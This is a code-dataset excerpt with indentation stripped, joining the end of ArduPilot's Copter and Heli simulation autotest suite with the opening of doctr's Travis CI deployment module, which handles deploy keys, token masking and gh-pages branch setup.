self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(5)
self.disarm_vehicle()
# inspect generated log for messages:
dfreader = self.dfreader_for_current_onboard_log()
wanted = set([0, 1, 2])
while True:
m = dfreader.recv_match(type="GPS") # disarmed
if m is None:
break
try:
wanted.remove(m.I)
except KeyError:
continue
if len(wanted) == 0:
break
if len(wanted):
raise NotAchievedException("Did not get all three GPS types")
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_callisto(self):
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto')), ],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def fly_each_frame(self):
vinfo = vehicleinfo.VehicleInfo()
copter_vinfo_options = vinfo.options[self.vehicleinfo_key()]
known_broken_frames = {
'cwx': "missing defaults file",
'deca-cwx': 'missing defaults file',
'djix': "missing defaults file",
'heli-compound': "wrong binary, different takeoff regime",
'heli-dual': "wrong binary, different takeoff regime",
'heli': "wrong binary, different takeoff regime",
'hexa-cwx': "does not take off",
'hexa-dji': "does not take off",
'octa-quad-cwx': "does not take off",
'tri': "does not take off",
}
for frame in sorted(copter_vinfo_options["frames"].keys()):
self.start_subtest("Testing frame (%s)" % str(frame))
if frame in known_broken_frames:
self.progress("Actually, no I'm not - it is known-broken (%s)" %
(known_broken_frames[frame]))
continue
frame_bits = copter_vinfo_options["frames"][frame]
print("frame_bits: %s" % str(frame_bits))
if frame_bits.get("external", False):
self.progress("Actually, no I'm not - it is an external simulation")
continue
model = frame_bits.get("model", frame)
# the model string for Callisto has crap in it.... we
# should really have another entry in the vehicleinfo data
# to carry the path to the JSON.
actual_model = model.split(":")[0]
defaults = self.model_defaults_filepath("ArduCopter", actual_model)
if type(defaults) != list:
defaults = [defaults]
self.customise_SITL_commandline(
["--defaults", ','.join(defaults), ],
model=model,
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def test_replay(self):
'''test replay correctness'''
self.progress("Building Replay")
util.build_SITL('tools/Replay', clean=False, configure=False)
self.test_replay_bit(self.test_replay_gps_bit)
self.test_replay_bit(self.test_replay_beacon_bit)
self.test_replay_bit(self.test_replay_optical_flow_bit)
def test_replay_bit(self, bit):
self.context_push()
current_log_filepath = bit()
self.progress("Running replay on (%s)" % current_log_filepath)
util.run_cmd(['build/sitl/tools/Replay', current_log_filepath],
directory=util.topdir(), checkfail=True, show=True)
self.context_pop()
replay_log_filepath = self.current_onboard_log_filepath()
self.progress("Replay log path: %s" % str(replay_log_filepath))
check_replay = util.load_local_module("Tools/Replay/check_replay.py")
ok = check_replay.check_log(replay_log_filepath, self.progress, verbose=True)
if not ok:
raise NotAchievedException("check_replay failed")
def test_copter_gps_zero(self):
# https://github.com/ArduPilot/ardupilot/issues/14236
self.progress("arm the vehicle and takeoff in Guided")
self.takeoff(20, mode='GUIDED')
self.progress("fly 50m North (or whatever)")
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
self.fly_guided_move_global_relative_alt(50, 0, 20)
self.set_parameter('GPS_TYPE', 0)
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 30 and self.mode_is('LAND'):
self.progress("Bug not reproduced")
break
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("Received (%s)" % str(m))
if m is None:
raise NotAchievedException("No GLOBAL_POSITION_INT?!")
pos_delta = self.get_distance_int(old_pos, m)
self.progress("Distance: %f" % pos_delta)
if pos_delta < 5:
raise NotAchievedException("Bug reproduced - returned to near origin")
self.wait_disarmed()
self.reboot_sitl()
# a wrapper around all the 1A,1B,1C..etc tests for travis
def tests1(self):
ret = ([])
ret.extend(self.tests1a())
ret.extend(self.tests1b())
ret.extend(self.tests1c())
ret.extend(self.tests1d())
ret.extend(self.tests1e())
return ret
def tests1a(self):
'''return list of all tests'''
ret = super(AutoTestCopter, self).tests() # about 5 mins and ~20 initial tests from autotest/common.py
ret.extend([
("NavDelayTakeoffAbsTime",
"Fly Nav Delay (takeoff)",
self.fly_nav_takeoff_delay_abstime), # 19s
("NavDelayAbsTime",
"Fly Nav Delay (AbsTime)",
self.fly_nav_delay_abstime), # 20s
("NavDelay",
"Fly Nav Delay",
self.fly_nav_delay), # 19s
("GuidedSubModeChange",
"Test submode change",
self.fly_guided_change_submode),
("LoiterToAlt",
"Loiter-To-Alt",
self.fly_loiter_to_alt), # 25s
("PayLoadPlaceMission",
"Payload Place Mission",
self.fly_payload_place_mission), # 44s
("PrecisionLoiterCompanion",
"Precision Loiter (Companion)",
self.fly_precision_companion), # 29s
("PrecisionLandingSITL",
"Precision Landing (SITL)",
self.fly_precision_sitl), # 29s
("SetModesViaModeSwitch",
"Set modes via modeswitch",
self.test_setting_modes_via_modeswitch),
("SetModesViaAuxSwitch",
"Set modes via auxswitch",
self.test_setting_modes_via_auxswitch),
("AuxSwitchOptions",
"Test random aux mode options",
self.test_aux_switch_options),
("AuxFunctionsInMission",
"Test use of auxilliary functions in missions",
self.test_aux_functions_in_mission),
("AutoTune",
"Fly AUTOTUNE mode",
self.fly_autotune), # 73s
])
return ret
def tests1b(self):
'''return list of all tests'''
ret = ([
("ThrowMode", "Fly Throw Mode", self.fly_throw_mode),
("BrakeMode", "Fly Brake Mode", self.fly_brake_mode),
("RecordThenPlayMission",
"Use switches to toggle in mission, then fly it",
self.fly_square), # 27s
("ThrottleFailsafe",
"Test Throttle Failsafe",
self.fly_throttle_failsafe), # 173s
("GCSFailsafe",
"Test GCS Failsafe",
self.fly_gcs_failsafe), # 239s
# this group has the smallest runtime right now at around
# 5mins, so add more tests here, till its around
# 9-10mins, then make a new group
])
return ret
def tests1c(self):
'''return list of all tests'''
ret = ([
("BatteryFailsafe",
"Fly Battery Failsafe",
self.fly_battery_failsafe), # 164s
("StabilityPatch",
"Fly stability patch",
lambda: self.fly_stability_patch(30)), # 17s
("OBSTACLE_DISTANCE_3D",
"Test proximity avoidance slide behaviour in 3D",
self.OBSTACLE_DISTANCE_3D), # ??s
("AC_Avoidance_Proximity",
"Test proximity avoidance slide behaviour",
self.fly_proximity_avoidance_test), # 41s
("AC_Avoidance_Fence",
"Test fence avoidance slide behaviour",
self.fly_fence_avoidance_test),
("AC_Avoidance_Beacon",
"Test beacon avoidance slide behaviour",
self.fly_beacon_avoidance_test), # 28s
("BaroWindCorrection",
"Test wind estimation and baro position error compensation",
self.fly_wind_baro_compensation),
("SetpointGlobalPos",
"Test setpoint global position",
self.test_set_position_global_int),
("SetpointGlobalVel",
"Test setpoint global velocity",
self.test_set_velocity_global_int),
("SplineTerrain",
"Test Splines and Terrain",
self.test_terrain_spline_mission),
])
return ret
def tests1d(self):
'''return list of all tests'''
ret = ([
("HorizontalFence",
"Test horizontal fence",
self.fly_fence_test), # 20s
("HorizontalAvoidFence",
"Test horizontal Avoidance fence",
self.fly_fence_avoid_test),
("MaxAltFence",
"Test Max Alt Fence",
self.fly_alt_max_fence_test), # 26s
("MinAltFence",
"Test Min Alt Fence",
self.fly_alt_min_fence_test), # 26s
("FenceFloorEnabledLanding",
"Test Landing with Fence floor enabled",
self.fly_fence_floor_enabled_landing),
("AutoTuneSwitch",
"Fly AUTOTUNE on a switch",
self.fly_autotune_switch), # 105s
("GPSGlitchLoiter",
"GPS Glitch Loiter Test",
self.fly_gps_glitch_loiter_test), # 30s
("GPSGlitchAuto",
"GPS Glitch Auto Test",
self.fly_gps_glitch_auto_test),
("ModeAltHold",
"Test AltHold Mode",
self.test_mode_ALT_HOLD),
("ModeLoiter",
"Test Loiter Mode",
self.loiter),
("SimpleMode",
"Fly in SIMPLE mode",
self.fly_simple),
("SuperSimpleCircle",
"Fly a circle in SUPER SIMPLE mode",
self.fly_super_simple), # 38s
("ModeCircle",
"Fly CIRCLE mode",
self.fly_circle), # 27s
("MagFail",
"Test magnetometer failure",
self.test_mag_fail),
("OpticalFlowLimits",
"Fly Optical Flow limits",
self.fly_optical_flow_limits), # 27s
("MotorFail",
"Fly motor failure test",
self.fly_motor_fail),
("Flip",
"Fly Flip Mode",
self.fly_flip),
("CopterMission",
"Fly copter mission",
self.fly_auto_test), # 37s
("SplineLastWaypoint",
"Test Spline as last waypoint",
self.test_spline_last_waypoint),
("Gripper",
"Test gripper",
self.test_gripper), # 28s
("TestGripperMission",
"Test Gripper mission items",
self.test_gripper_mission),
("VisionPosition",
"Fly Vision Position",
self.fly_vision_position), # 24s
("GPSViconSwitching",
"Fly GPS and Vicon Switching",
self.fly_gps_vicon_switching),
])
return ret
def tests1e(self):
'''return list of all tests'''
ret = ([
("BeaconPosition",
"Fly Beacon Position",
self.fly_beacon_position), # 56s
("RTLSpeed",
"Fly RTL Speed",
self.fly_rtl_speed),
("Mount",
"Test Camera/Antenna Mount",
self.test_mount), # 74s
("Button",
"Test Buttons",
self.test_button),
("ShipTakeoff",
"Fly Simulated Ship Takeoff",
self.fly_ship_takeoff),
("RangeFinder",
"Test RangeFinder Basic Functionality",
self.test_rangefinder), # 23s
("SurfaceTracking",
"Test Surface Tracking",
self.test_surface_tracking), # 45s
("Parachute",
"Test Parachute Functionality",
self.test_parachute),
("ParameterChecks",
"Test Arming Parameter Checks",
self.test_parameter_checks),
("ManualThrottleModeChange",
"Check manual throttle mode changes denied on high throttle",
self.fly_manual_throttle_mode_change),
("MANUAL_CONTROL",
"Test mavlink MANUAL_CONTROL",
self.test_manual_control),
("ZigZag",
"Fly ZigZag Mode",
self.fly_zigzag_mode), # 58s
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_poshold_takeoff),
("FOLLOW",
"Fly follow mode",
self.fly_follow_mode), # 80s
("RangeFinderDrivers",
"Test rangefinder drivers",
self.fly_rangefinder_drivers), # 62s
("MaxBotixI2CXL",
"Test maxbotix rangefinder drivers",
self.fly_rangefinder_driver_maxbotix), # 62s
("MAVProximity",
"Test MAVLink proximity driver",
self.fly_proximity_mavlink_distance_sensor,
),
("ParameterValidation",
"Test parameters are checked for validity",
self.test_parameter_validation),
("AltTypes",
"Test Different Altitude Types",
self.test_altitude_types),
("RichenPower",
"Test RichenPower generator",
self.test_richenpower),
("IE24",
"Test IntelligentEnergy 2.4kWh generator",
self.test_ie24),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
# a wrapper around all the 2A,2B,2C..etc tests for travis
def tests2(self):
ret = ([])
ret.extend(self.tests2a())
ret.extend(self.tests2b())
return ret
def tests2a(self):
'''return list of all tests'''
ret = ([
# something about SITLCompassCalibration appears to fail
# this one, so we put it first:
("FixedYawCalibration",
"Test Fixed Yaw Calibration", # about 20 secs
self.test_fixed_yaw_calibration),
# we run this single 8min-and-40s test on its own, apart from
# requiring FixedYawCalibration right before it because without it, it fails to calibrate
("SITLCompassCalibration", # this autotest appears to interfere with FixedYawCalibration, no idea why.
"Test SITL onboard compass calibration",
self.test_mag_calibration),
])
return ret
def tests2b(self): # this block currently around 9.5mins here
'''return list of all tests'''
ret = ([
Test("MotorVibration",
"Fly motor vibration test",
self.fly_motor_vibration),
Test("DynamicNotches",
"Fly Dynamic Notches",
self.fly_dynamic_notches,
attempts=8),
Test("PositionWhenGPSIsZero",
"Ensure position doesn't zero when GPS lost",
self.test_copter_gps_zero),
Test("GyroFFT",
"Fly Gyro FFT",
self.fly_gyro_fft,
attempts=8),
Test("GyroFFTHarmonic",
"Fly Gyro FFT Harmonic Matching",
self.fly_gyro_fft_harmonic,
attempts=8),
Test("CompassReordering",
"Test Compass reordering when priorities are changed",
self.test_mag_reordering), # 40sec?
Test("CRSF",
"Test RC CRSF",
self.test_crsf), # 20secs ish
Test("MotorTest",
"Run Motor Tests",
self.test_motortest), # 20secs ish
Test("AltEstimation",
"Test that Alt Estimation is mandatory for ALT_HOLD",
self.test_alt_estimate_prearm), # 20secs ish
Test("EKFSource",
"Check EKF Source Prearms work",
self.test_ekf_source),
Test("GSF",
"Check GSF",
self.test_gsf),
Test("FlyEachFrame",
"Fly each supported internal frame",
self.fly_each_frame),
Test("GPSBlending",
"Test GPS Blending",
self.test_gps_blending),
Test("DataFlash",
"Test DataFlash Block backend",
self.test_dataflash_sitl),
Test("DataFlashErase",
"Test DataFlash Block backend erase",
self.test_dataflash_erase),
Test("Callisto",
"Test Callisto",
self.test_callisto),
Test("Replay",
"Test Replay",
self.test_replay),
Test("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def testcan(self):
ret = ([
("CANGPSCopterMission",
"Fly copter mission",
self.fly_auto_test_using_can_gps),
])
return ret
def tests(self):
ret = []
ret.extend(self.tests1())
ret.extend(self.tests2())
return ret
def disabled_tests(self):
return {
"Parachute": "See https://github.com/ArduPilot/ardupilot/issues/4702",
"HorizontalAvoidFence": "See https://github.com/ArduPilot/ardupilot/issues/11525",
"AltEstimation": "See https://github.com/ArduPilot/ardupilot/issues/15191",
}
class AutoTestHeli(AutoTestCopter):
def log_name(self):
return "HeliCopter"
def default_frame(self):
return "heli"
def sitl_start_location(self):
return SITL_START_LOCATION_AVC
def default_speedup(self):
'''Heli seems to be race-free'''
return 100
def is_heli(self):
return True
def rc_defaults(self):
ret = super(AutoTestHeli, self).rc_defaults()
ret[8] = 1000
ret[3] = 1000 # collective
return ret
@staticmethod
def get_position_armable_modes_list():
'''filter THROW mode out of armable modes list; Heli is special-cased'''
ret = AutoTestCopter.get_position_armable_modes_list()
ret = filter(lambda x : x != "THROW", ret)
return ret
def loiter_requires_position(self):
self.progress("Skipping loiter-requires-position for heli; rotor runup issues")
def get_collective_out(self):
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
chan_pwm = (servo.servo1_raw + servo.servo2_raw + servo.servo3_raw)/3.0
return chan_pwm
def rotor_runup_complete_checks(self):
# Takeoff and landing in Loiter
TARGET_RUNUP_TIME = 10
self.zero_throttle()
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
coll = servo.servo1_raw
coll = coll + 50
self.set_parameter("H_RSC_RUNUP_TIME", TARGET_RUNUP_TIME)
self.progress("Initiate Runup by putting some throttle")
self.set_rc(8, 2000)
self.set_rc(3, 1700)
self.progress("Collective threshold PWM %u" % coll)
tstart = self.get_sim_time()
self.progress("Wait that collective PWM pass threshold value")
servo = self.mav.recv_match(condition='SERVO_OUTPUT_RAW.servo1_raw>%u' % coll, blocking=True)
runup_time = self.get_sim_time() - tstart
self.progress("Collective is now at PWM %u" % servo.servo1_raw)
self.mav.wait_heartbeat()
if runup_time < TARGET_RUNUP_TIME:
self.zero_throttle()
self.set_rc(8, 1000)
self.disarm_vehicle()
self.mav.wait_heartbeat()
raise NotAchievedException("Takeoff initiated before runup time complete %u" % runup_time)
self.progress("Runup time %u" % runup_time)
self.zero_throttle()
self.set_rc(8, 1000)
self.land_and_disarm()
self.mav.wait_heartbeat()
# fly_avc_test - fly AVC mission
def fly_avc_test(self):
# Arm
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
# upload mission from file
self.progress("# Load copter_AVC2013_mission")
# load the waypoint count
num_wp = self.load_mission("copter_AVC2013_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_AVC2013_mission failed")
self.progress("Fly AVC mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
# wait for motor runup
self.delay_sim_time(20)
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
self.progress("AVC mission completed: passed!")
def fly_heli_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.zero_throttle()
self.set_rc(8, 1000)
self.wait_ready_to_arm()
# Arm
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_relalt_mm = 1000
if abs(m.relative_alt) > max_relalt_mm:
raise NotAchievedException("Took off prematurely (abs(%f)>%f)" %
(m.relative_alt, max_relalt_mm))
self.progress("Pushing collective past half-way")
self.set_rc(3, 1600)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover collective")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 500:
raise NotAchievedException("Took off too fast")
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_heli_stabilize_takeoff(self):
""""""
self.context_push()
ex = None
try:
self.change_mode('STABILIZE')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle past half-way")
self.set_rc(3, 1600)
self.progress("Monitoring takeoff")
self.wait_altitude(6.9, 8, relative=True)
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_spline_waypoint(self, timeout=600):
"""ensure basic spline functionality works"""
self.load_mission("copter_spline_mission.txt", strict=False)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.delay_sim_time(20)
self.change_mode("AUTO")
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > timeout:
raise AutoTestTimeoutException("Vehicle did not disarm after mission")
if not self.armed():
break
self.delay_sim_time(1)
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def fly_autorotation(self, timeout=600):
"""ensure basic spline functionality works"""
self.set_parameter("AROT_ENABLE", 1)
start_alt = 100 # metres
self.set_parameter("PILOT_TKOFF_ALT", start_alt * 100)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
self.set_rc(3, 2000)
self.wait_altitude(start_alt - 1,
(start_alt + 5),
relative=True,
timeout=timeout)
self.context_collect('STATUSTEXT')
self.progress("Triggering autorotate by raising interlock")
self.set_rc(8, 1000)
self.wait_statustext("SS Glide Phase", check_context=True)
self.wait_statustext(r"SIM Hit ground at ([0-9.]+) m/s",
check_context=True,
regex=True)
speed = float(self.re_match.group(1))
if speed > 30:
raise NotAchievedException("Hit too hard")
self.wait_disarmed()
def set_rc_default(self):
super(AutoTestHeli, self).set_rc_default()
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def tests(self):
'''return list of all tests'''
ret = AutoTest.tests(self)
ret.extend([
("AVCMission", "Fly AVC mission", self.fly_avc_test),
("RotorRunUp",
"Test rotor runup",
self.rotor_runup_complete_checks),
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_heli_poshold_takeoff),
("StabilizeTakeOff",
"Fly stabilize takeoff",
self.fly_heli_stabilize_takeoff),
("SplineWaypoint",
"Fly Spline Waypoints",
self.fly_spline_waypoint),
("AutoRotation",
"Fly AutoRotation",
self.fly_autorotation),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def disabled_tests(self):
return {
"SplineWaypoint": "See https://github.com/ArduPilot/ardupilot/issues/14593",
}
class AutoTestCopterTests1(AutoTestCopter):
def tests(self):
return self.tests1()
class AutoTestCopterTests1a(AutoTestCopter):
def tests(self):
return self.tests1a()
class AutoTestCopterTests1b(AutoTestCopter):
def tests(self):
return self.tests1b()
class AutoTestCopterTests1c(AutoTestCopter):
def tests(self):
return self.tests1c()
class AutoTestCopterTests1d(AutoTestCopter):
def tests(self):
return self.tests1d()
class AutoTestCopterTests1e(AutoTestCopter):
def tests(self):
return self.tests1e()
class AutoTestCopterTests2(AutoTestCopter):
def tests(self):
return self.tests2()
class AutoTestCopterTests2a(AutoTestCopter):
def tests(self):
return self.tests2a()
class AutoTestCopterTests2b(AutoTestCopter):
def tests(self):
return self.tests2b()
class AutoTestCAN(AutoTestCopter):
def tests(self):
return self.testcan()
|
gpl-3.0
| 940,847,501,828,778,200
| 37.953043
| 127
| 0.537486
| false
| 3.739827
| true
| false
| false
|
gforsyth/doctr_testing
|
doctr/travis.py
|
1
|
12160
|
"""
The code that should be run on Travis
"""
import os
import shlex
import shutil
import subprocess
import sys
import glob
from cryptography.fernet import Fernet
def decrypt_file(file, key):
"""
Decrypts the file ``file``.
The encrypted file is assumed to end with the ``.enc`` extension. The
decrypted file is saved to the same location without the ``.enc``
extension.
The permissions on the decrypted file are automatically set to 0o600.
See also :func:`doctr.local.encrypt_file`.
"""
if not file.endswith('.enc'):
raise ValueError("%s does not end with .enc" % file)
fer = Fernet(key)
with open(file, 'rb') as f:
decrypted_file = fer.decrypt(f.read())
with open(file[:-4], 'wb') as f:
f.write(decrypted_file)
os.chmod(file[:-4], 0o600)
def setup_deploy_key(keypath='github_deploy_key', key_ext='.enc'):
"""
Decrypts the deploy key and configures it with ssh
The key is assumed to be encrypted as keypath + key_ext, and the
encryption key is assumed to be set in the environment variable
DOCTR_DEPLOY_ENCRYPTION_KEY.
"""
key = os.environ.get("DOCTR_DEPLOY_ENCRYPTION_KEY", None)
if not key:
raise RuntimeError("DOCTR_DEPLOY_ENCRYPTION_KEY environment variable is not set")
key_filename = os.path.basename(keypath)
key = key.encode('utf-8')
decrypt_file(keypath + key_ext, key)
key_path = os.path.expanduser("~/.ssh/" + key_filename)
os.makedirs(os.path.expanduser("~/.ssh"), exist_ok=True)
os.rename(keypath, key_path)
with open(os.path.expanduser("~/.ssh/config"), 'a') as f:
f.write("Host github.com"
' IdentityFile "%s"'
" LogLevel ERROR\n" % key_path)
# start ssh-agent and add key to it
# info from SSH agent has to be put into the environment
agent_info = subprocess.check_output(['ssh-agent', '-s'])
agent_info = agent_info.decode('utf-8')
agent_info = agent_info.split()
AUTH_SOCK = agent_info[0].split('=')[1][:-1]
AGENT_PID = agent_info[3].split('=')[1][:-1]
os.putenv('SSH_AUTH_SOCK', AUTH_SOCK)
os.putenv('SSH_AGENT_PID', AGENT_PID)
run(['ssh-add', os.path.expanduser('~/.ssh/' + key_filename)])
# XXX: Do this in a way that is streaming
def run_command_hiding_token(args, token):
command = ' '.join(map(shlex.quote, args))
command = command.replace(token.decode('utf-8'), '~'*len(token))
print(command)
p = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.stdout, p.stderr
out = out.replace(token, b"~"*len(token))
err = err.replace(token, b"~"*len(token))
return (out, err, p.returncode)
def get_token():
"""
Get the encrypted GitHub token in Travis.
Make sure the contents this variable do not leak. The ``run()`` function
will remove this from the output, so always use it.
"""
token = os.environ.get("GH_TOKEN", None)
if not token:
raise RuntimeError("GH_TOKEN environment variable not set")
token = token.encode('utf-8')
return token
def run(args):
"""
Run the command ``args``.
Automatically hides the secret GitHub token from the output.
"""
if "DOCTR_DEPLOY_ENCRYPTION_KEY" in os.environ:
token = b''
else:
token = get_token()
out, err, returncode = run_command_hiding_token(args, token)
if out:
print(out.decode('utf-8'))
if err:
print(err.decode('utf-8'), file=sys.stderr)
if returncode != 0:
sys.exit(returncode)
def get_current_repo():
"""
Get the GitHub repo name for the current directory.
Assumes that the repo is in the ``origin`` remote.
"""
remote_url = subprocess.check_output(['git', 'config', '--get',
'remote.origin.url']).decode('utf-8')
# Travis uses the https clone url
_, org, git_repo = remote_url.rsplit('.git', 1)[0].rsplit('/', 2)
return (org + '/' + git_repo)
def setup_GitHub_push(deploy_repo, auth_type='deploy_key', full_key_path='github_deploy_key.enc', require_master=True, deploy_branch='gh-pages'):
"""
Setup the remote to push to GitHub (to be run on Travis).
``auth_type`` should be either ``'deploy_key'`` or ``'token'``.
For ``auth_type='token'``, this sets up the remote with the token and
checks out the gh-pages branch. The token to push to GitHub is assumed to be in the ``GH_TOKEN`` environment
variable.
For ``auth_type='deploy_key'``, this sets up the remote with ssh access.
"""
if auth_type not in ['deploy_key', 'token']:
raise ValueError("auth_type must be 'deploy_key' or 'token'")
TRAVIS_BRANCH = os.environ.get("TRAVIS_BRANCH", "")
TRAVIS_PULL_REQUEST = os.environ.get("TRAVIS_PULL_REQUEST", "")
if TRAVIS_BRANCH != "master" and require_master:
print("The docs are only pushed to {} from master. To allow pushing from "
"a non-master branch, use the --no-require-master flag".format(deploy_branch), file=sys.stderr)
print("This is the {TRAVIS_BRANCH} branch".format(TRAVIS_BRANCH=TRAVIS_BRANCH), file=sys.stderr)
return False
if TRAVIS_PULL_REQUEST != "false":
print("The website and docs are not pushed to {} on pull requests".format(deploy_branch),
file=sys.stderr)
return False
print("Setting git attributes")
# Should we add some user.email?
run(['git', 'config', '--global', 'user.name', "Doctr (Travis CI)"])
remotes = subprocess.check_output(['git', 'remote']).decode('utf-8').split('\n')
if 'doctr_remote' in remotes:
print("doctr_remote already exists, removing")
run(['git', 'remote', 'remove', 'doctr_remote'])
print("Adding doctr remote")
if auth_type == 'token':
token = get_token()
run(['git', 'remote', 'add', 'doctr_remote',
'https://{token}@github.com/{deploy_repo}.git'.format(token=token.decode('utf-8'),
deploy_repo=deploy_repo)])
else:
keypath, key_ext = full_key_path.rsplit('.', 1)
key_ext = '.' + key_ext
setup_deploy_key(keypath=keypath, key_ext=key_ext)
run(['git', 'remote', 'add', 'doctr_remote',
'git@github.com:{deploy_repo}.git'.format(deploy_repo=deploy_repo)])
print("Fetching doctr remote")
run(['git', 'fetch', 'doctr_remote'])
#create empty branch with .nojekyll if it doesn't already exist
new_deploy_branch = create_deploy_branch(deploy_branch)
print("Checking out {}".format(deploy_branch))
local_deploy_branch_exists = deploy_branch in subprocess.check_output(['git', 'branch']).decode('utf-8').split()
if new_deploy_branch or local_deploy_branch_exists:
run(['git', 'checkout', deploy_branch])
run(['git', 'pull', 'doctr_remote', deploy_branch])
else:
run(['git', 'checkout', '-b', deploy_branch, '--track',
'doctr_remote/{}'.format(deploy_branch)])
print("Done")
return True
def deploy_branch_exists(deploy_branch='gh-pages'):
"""Check if the remote deploy branch exists
This isn't completely robust. If there are multiple remotes and the branch
is created on the non-default remote, this won't see it.
"""
remote_name = 'doctr_remote'
branch_names = subprocess.check_output(['git', 'branch', '-r']).decode('utf-8').split()
return '{remote}/{branch}'.format(remote=remote_name,
branch=deploy_branch) in branch_names
def create_deploy_branch(deploy_branch):
"""
If there is no remote deploy branch, create one.
Return True if branch was created, False if not.
Default value for deploy_branch is ``gh-pages``
"""
if not deploy_branch_exists(deploy_branch):
print("Creating {} branch".format(deploy_branch))
run(['git', 'checkout', '--orphan', deploy_branch])
# delete everything in the new ref. this is non-destructive to existing
# refs/branches, etc...
run(['git', 'rm', '-rf', '.'])
print("Adding .nojekyll file to {}".format(deploy_branch))
run(['touch', '.nojekyll'])
run(['git', 'add', '.nojekyll'])
run(['git', 'commit', '-m', 'Create new branch {} with .nojekyll'.format(deploy_branch)])
print("Pushing branch {} to remote".format(deploy_branch))
run(['git', 'push', '-u', 'doctr_remote', deploy_branch])
# return to master branch
run(['git', 'checkout', '-'])
return True
return False
def find_sphinx_build_dir():
"""
Find build subfolder within sphinx docs directory.
This is called by :func:`commit_docs` if keyword arg ``built_docs`` is not
specified on the command line.
"""
build = glob.glob('**/*build/html', recursive=True)
if not build:
raise RuntimeError("Could not find Sphinx build directory automatically")
build_folder = build[0]
return build_folder
# Here is the logic to get the Travis job number, to only run commit_docs in
# the right build.
#
# TRAVIS_JOB_NUMBER = os.environ.get("TRAVIS_JOB_NUMBER", '')
# ACTUAL_TRAVIS_JOB_NUMBER = TRAVIS_JOB_NUMBER.split('.')[1]
def sync_from_log(src, dst, log_file):
"""
Sync the files in ``src`` to ``dst``.
The files that are synced are logged to ``log_file``. If ``log_file``
exists, the files in ``log_file`` are removed first.
Returns ``(added, removed)``, where added is a list of all files synced from
``src`` (even if it already existed in ``dst``), and ``removed`` is every
file from ``log_file`` that was removed from ``dst`` because it wasn't in
``src``. ``added`` also includes the log file.
"""
from os.path import join, exists, isdir
if not src.endswith(os.sep):
src += os.sep
added, removed = [], []
if not exists(log_file):
# Assume this is the first run
print("%s doesn't exist. Not removing any files." % log_file)
else:
with open(log_file) as f:
files = f.read().strip().split('\n')
for new_f in files:
new_f = new_f.strip()
if exists(new_f):
